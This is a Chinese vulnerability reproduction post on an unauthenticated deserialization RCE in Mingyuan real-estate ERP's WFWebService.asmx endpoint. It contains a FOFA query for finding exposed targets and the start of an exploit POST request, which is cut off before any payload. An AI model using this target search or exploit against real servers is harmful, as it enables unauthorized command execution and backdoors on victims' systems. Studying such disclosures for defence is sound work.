明源地产ERP WFWebService.asmx 反序列化RCE漏洞复现

0x01 产品简介

明源地产ERP是一款专为房地产行业设计的企业资源规划（ERP）系统，系统集成了项目管理、财务管理、客户关系管理、营销管理等多个模块，旨在帮助房地产企业提升运营效率、降低成本和提高客户满意度。它充分考虑了房地产行业的特性和需求，通过整合企业的各个业务环节，实现信息的统一管理和高效协同。

0x02 漏洞概述

明源地产ERP WFWebService.asmx 接口处存在反序列化远程代码执行漏洞，未经身份验证的远程攻击者可利用此漏洞执行任意系统命令，写入后门文件，获取服务器权限。

0x03 复现环境

FOFA：

title="明源地产ERP"

0x04 漏洞复现

Exp

POST /MyWorkflowManagement/WebService/WFWebService.asmx HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari